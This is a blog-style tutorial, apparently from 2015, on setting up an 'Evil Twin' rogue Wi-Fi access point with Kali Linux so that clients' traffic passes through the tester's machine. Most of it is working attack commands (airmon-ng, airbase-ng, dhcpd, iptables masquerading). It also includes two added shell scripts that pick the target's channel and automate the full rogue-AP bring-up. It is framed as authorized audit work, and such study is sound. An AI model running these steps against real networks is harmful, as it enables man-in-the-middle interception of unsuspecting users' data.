August 22, 2015

When conducting a security audit, you should also make sure to test any wireless networks that may be set up. As these networks do not require direct, physical access to the building housing the wireless access points, they can be attacked by someone sitting in their car outside or even by a neighbor. In this tutorial, we will be using Kali Linux to create an Evil Twin wireless access point, which is useful both for testing the current wireless setup and for testing the human element of security.

An Evil Twin AP is a wireless AP that appears to be legitimate, sometimes even using the same SSID as another AP in the area, but allows an attacker to both view and control the data sent to/from any clients connected to it. Once connected to it, users typically would not suspect anything as they are able to successfully access any network assets and/or the Internet. Unfortunately for them, you are the Man-in-the-Middle and have visibility and control over their data packets.

Please note: The following tutorial is being tested against my own access point, and these steps should ONLY be performed against your own access point, or one you have been authorized to test against.

I. Equipment Needed
You will need a fairly decent wireless adapter, one whose driver supports monitor mode and packet injection, in order to successfully perform this attack during an audit. I am currently using the Alfa AWUS036NH USB wireless adapter. It is a good fit for Kali Linux, as Kali ships the proper drivers for it, letting you get started more quickly. You will also, naturally, need to be running Kali Linux.

II. Getting Started
Before we get started, you should go ahead and connect to a network that has Internet connectivity. You can do this via Ethernet or via WiFi. For this example, I will be connecting to a separate SSID of mine via my internal wireless card (wlan0); the Alfa adapter shows up as wlan1 and will host the Evil Twin. If you choose to use Ethernet, then in some of the example commands you will need to replace "wlan0" with "eth0."

Unless you already know the target SSID that you will be mimicking and the corresponding channel that it is operating on, you will need to run a quick wireless scan and determine that information. This can be quickly accomplished via the following command:

iwlist wlan1 scanning

After documenting both the SSID and channel of the target, put the Alfa card into monitor mode. airmon-ng prints the name of the monitor interface it creates (mon0 here), which the following steps use:

airmon-ng start wlan1
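As an added example that is not part of the original post: a small shell helper that parses the output of the scan above and pulls out, for every cell, the BSSID, channel, signal level and ESSID, then picks the strongest cell for a given SSID (a target with several access points will show up under several BSSIDs and possibly several channels, and the strongest one is the one clients nearby are most likely to roam to). The scan output embedded below is constructed for the demo; the MAC addresses, channels and signal levels are made up, and only the SSID "SkyNet" is the post's own test network.

```shell
#!/bin/sh
# Added example, not from the original post. Parses "iwlist wlan1 scanning"
# output. The sample output below is constructed; the addresses, channels
# and signal levels are invented for the demo.

sample_scan() {  # constructed iwlist output; for a live scan use: iwlist wlan1 scanning
    cat <<'EOF'
wlan1     Scan completed :
          Cell 01 - Address: 00:11:22:33:44:55
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=60/70  Signal level=-50 dBm
                    Encryption key:on
                    ESSID:"SkyNet"
                    Mode:Master
          Cell 02 - Address: 66:77:88:99:AA:BB
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=40/70  Signal level=-70 dBm
                    Encryption key:on
                    ESSID:"Neighbor"
                    Mode:Master
          Cell 03 - Address: 00:11:22:33:44:66
                    Channel:1
                    Frequency:2.412 GHz (Channel 1)
                    Quality=45/70  Signal level=-65 dBm
                    Encryption key:on
                    ESSID:"SkyNet"
                    Mode:Master
EOF
}

# parse_scan: stdin is iwlist output, stdout is one tab-separated line per
# cell: BSSID, channel, signal level (dBm), ESSID.
parse_scan() {
    awk '
        function flush() {
            if (bssid != "") printf "%s\t%s\t%s\t%s\n", bssid, chan, sig, essid
            bssid = chan = sig = essid = ""
        }
        /Cell [0-9]+ - Address:/ { flush(); bssid = $NF }
        /^ *Channel:/            { sub(/.*Channel:/, ""); chan = $0 }
        /Signal level=/          { match($0, /Signal level=-?[0-9]+/)
                                   sig = substr($0, RSTART + 13, RLENGTH - 13) }
        /ESSID:/                 { sub(/.*ESSID:"/, ""); sub(/".*$/, ""); essid = $0 }
        END { flush() }
    '
}

# best_bssid_for <essid>: from parse_scan output on stdin, keep only the
# strongest cell (highest dBm value) carrying that ESSID.
best_bssid_for() {
    awk -F'\t' -v want="$1" '
        $4 == want && (!found || $3 + 0 > best) { found = 1; best = $3 + 0; line = $0 }
        END { if (found) print line }'
}

# target_channel <essid>: the channel to hand to airbase-ng -c
target_channel() { best_bssid_for "$1" | cut -f2; }

# Demo against the constructed sample.
echo "BSSID, channel, signal, ESSID for every cell:"
sample_scan | parse_scan
echo "Strongest SkyNet cell:"
sample_scan | parse_scan | best_bssid_for SkyNet
echo "Channel to give airbase-ng: $(sample_scan | parse_scan | target_channel SkyNet)"
```

Against a live scan, replace `sample_scan` with `iwlist wlan1 scanning` (run as root, and before the card is switched to monitor mode, since iwlist cannot scan on a monitor interface). Signal levels are compared numerically, so -50 dBm correctly beats -65 dBm.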

III. Configuring the Evil Twin
With the SSID and broadcasting channel of our target, we can now create our own access point using the same values. airbase-ng runs in the foreground and creates a tap interface named at0 for the fake network, so leave it running in its own terminal. This is done via the following command:

airbase-ng -e [Target's SSID] -c [Target's Channel] mon0

In this example, we are mimicking the SSID "SkyNet," which I have setup for testing.

Now you will need to configure the IP address and subnet mask for your access point. If you happen to know the IP scheme of your target, possibly by authenticating to it previously, then you should use its IP scheme.

ifconfig at0 up
ifconfig at0 [IP Address for Our AP] netmask [Subnet Mask for AP]

Next, we need to configure DHCP to run on our Evil Twin so that clients get an address, a gateway and DNS servers from us. Again, you should use the IP scheme of your target if you already know that information, including a range of addresses to hand out. Before enabling DHCP, we need to create the config file that dhcpd will use. The following is the config file being used for this example:

     # Google's DNS servers
     option domain-name-servers 8.8.8.8, 8.8.4.4;
     default-lease-time 600;
     option T150 code 150 = string;
     deny client-updates;
     one-lease-per-client false;
     allow bootp;
     ddns-updates off;
     ddns-update-style none;
     # DHCP Scope & Configuration for our AP
     subnet [Network of our AP] netmask [Subnet Mask for AP] {
         interface at0;
         # Addresses handed out to clients; dhcpd cannot lease anything without a range
         range [First lease address] [Last lease address];
         option routers [IP Address for Our AP];
         option subnet-mask [Subnet Mask for AP];
         option broadcast-address [Broadcast address of our AP's network];
         option domain-name-servers 8.8.8.8, 8.8.4.4;
         allow unknown-clients;
     }

Using this configuration file, we can now enable DHCP on our AP. Make sure the leases file (/var/lib/dhcp/dhcpd.leases on Kali) exists first, as dhcpd refuses to start without it:

dhcpd -d -f -cf /etc/dhcp/RogueAP_DHCPD.conf at0 &

IV. Configuring IP Forwarding
While we now have an access point that clients can connect to and obtain a proper DHCP address from, they still cannot connect to any network/Internet resources. In order to allow this, we will need to configure IP forwarding. This will allow anyone connecting to the fake SSID to have their connection routed through our other network adapter (wlan0).

We first need to add a static route and configure our access point's IP address as the local gateway.

route add -net [Network of our AP] netmask [Subnet mask of our AP] gw [AP's IP address]

Next, we configure iptables to masquerade (source-NAT) traffic leaving through wlan0, so that replies come back to our machine and are passed on to the client. If your FORWARD chain's default policy is DROP, you will also need rules accepting traffic between at0 and wlan0.

iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE

Finally, we activate IP forwarding in the kernel by writing 1 to the corresponding /proc/sys entry (this setting does not survive a reboot).

echo "1" > /proc/sys/net/ipv4/ip_forward

If you have followed all of these steps correctly, you should now have a functional Evil Twin access point that is mimicking the appearance of the targeted AP. Anyone connecting to what they believe is a legitimate access point will now have their data packets routed through your PC to the corporate network and/or Internet.
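As an added example that is not part of the original post: sections III and IV gathered into one script, with the post's placeholders filled by assumed values (AP address 192.168.13.1/24, leases 192.168.13.100 to .200, uplink wlan0, monitor interface mon0, SSID "SkyNet" on channel 6). The script generates the dhcpd config from those values, computes the network and broadcast addresses the config and the route need, and then runs the bring-up commands. With DRY_RUN=1 (the default) every command is printed instead of executed, so you can check the generated config and command lines before running it as root with DRY_RUN=0.

```shell
#!/bin/sh
# Added example, not the post's own script: sections III and IV as one
# bring-up. Assumed values (the post leaves them as placeholders): AP address
# 192.168.13.1/24, leases .100-.200, uplink wlan0, monitor interface mon0.
# With DRY_RUN=1 (default) every command is printed instead of executed.
DRY_RUN=${DRY_RUN:-1}
CONF=/etc/dhcp/RogueAP_DHCPD.conf     # config path used by the post
LEASES=/var/lib/dhcp/dhcpd.leases     # dhcpd will not start if this is missing

run() {     # execute when DRY_RUN=0, otherwise print the command line
    if [ "$DRY_RUN" = 0 ]; then "$@"; else echo "$*"; fi
}
run_bg() {  # same, for daemons that must keep running (airbase-ng, dhcpd)
    if [ "$DRY_RUN" = 0 ]; then
        "$@" &
    else
        echo "$* &"
    fi
}

octets() { printf '%s' "$1" | tr . ' '; }   # "a.b.c.d" -> "a b c d"

network_of() {    # network_of 192.168.13.1 255.255.255.0 -> 192.168.13.0
    set -- $(octets "$1") $(octets "$2")
    printf '%d.%d.%d.%d\n' $(($1 & $5)) $(($2 & $6)) $(($3 & $7)) $(($4 & $8))
}
broadcast_of() {  # broadcast_of 192.168.13.1 255.255.255.0 -> 192.168.13.255
    set -- $(octets "$1") $(octets "$2")
    printf '%d.%d.%d.%d\n' $(($1 | (255 - $5))) $(($2 | (255 - $6))) \
                           $(($3 | (255 - $7))) $(($4 | (255 - $8)))
}

# gen_dhcpd_conf <ap_ip> <netmask> <first_lease> <last_lease> [dns ...]
# Prints a dhcpd.conf equivalent to the post's, with the scope filled in.
gen_dhcpd_conf() {
    ap_ip=$1 mask=$2 first=$3 last=$4
    shift 4
    [ $# -gt 0 ] || set -- 8.8.8.8 8.8.4.4        # Google's resolvers, as in the post
    dns=$(printf '%s, ' "$@" | sed 's/, $//')
    net=$(network_of "$ap_ip" "$mask")
    bcast=$(broadcast_of "$ap_ip" "$mask")
    cat <<EOF
option domain-name-servers $dns;
default-lease-time 600;
deny client-updates;
one-lease-per-client false;
allow bootp;
ddns-updates off;
ddns-update-style none;
subnet $net netmask $mask {
    interface at0;
    range $first $last;
    option routers $ap_ip;
    option subnet-mask $mask;
    option broadcast-address $bcast;
    option domain-name-servers $dns;
    allow unknown-clients;
}
EOF
}

# bring_up <ssid> <channel> <ap_ip> <netmask> <first_lease> <last_lease> <uplink_if> <monitor_if>
bring_up() {
    ssid=$1 chan=$2 ap_ip=$3 mask=$4 first=$5 last=$6 uplink=$7 mon=$8
    net=$(network_of "$ap_ip" "$mask")

    # III. fake AP on the target's SSID/channel; at0 appears once airbase-ng runs
    run_bg airbase-ng -e "$ssid" -c "$chan" "$mon"
    if [ "$DRY_RUN" = 0 ]; then sleep 2; fi
    run ifconfig at0 up
    run ifconfig at0 "$ap_ip" netmask "$mask"

    # DHCP on at0 (config written to $CONF; shown on stdout in dry-run mode)
    if [ "$DRY_RUN" = 0 ]; then
        gen_dhcpd_conf "$ap_ip" "$mask" "$first" "$last" > "$CONF"
        touch "$LEASES"
    else
        echo "# would write $CONF:"
        gen_dhcpd_conf "$ap_ip" "$mask" "$first" "$last"
        echo "touch $LEASES"
    fi
    run_bg dhcpd -d -f -cf "$CONF" -lf "$LEASES" at0

    # IV. route as in the post (ifconfig already added the connected route for
    # $net on at0, so a failure here is not fatal), NAT out of the uplink,
    # allow forwarding both ways even if FORWARD's policy is DROP, enable forwarding
    run route add -net "$net" netmask "$mask" gw "$ap_ip" || true
    run iptables -t nat -A POSTROUTING -o "$uplink" -j MASQUERADE
    run iptables -A FORWARD -i at0 -o "$uplink" -j ACCEPT
    run iptables -A FORWARD -i "$uplink" -o at0 -m state --state RELATED,ESTABLISHED -j ACCEPT
    run sysctl -w net.ipv4.ip_forward=1
}

# Dry-run demo with the assumed values; run as root with DRY_RUN=0 to execute.
bring_up SkyNet 6 192.168.13.1 255.255.255.0 192.168.13.100 192.168.13.200 wlan0 mon0
```

The dry-run output is the exact sequence of commands from sections III and IV with the placeholders resolved, so it doubles as a checklist: confirm the subnet line matches the target's scheme and the uplink interface is the one that actually has Internet access before flipping DRY_RUN to 0. The two FORWARD rules are not in the post; they are only needed when the default FORWARD policy is DROP, and they are harmless otherwise.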

Tune in for part two where we go over some possibilities now that you have gained control over the clients' connectivity. To be continued...

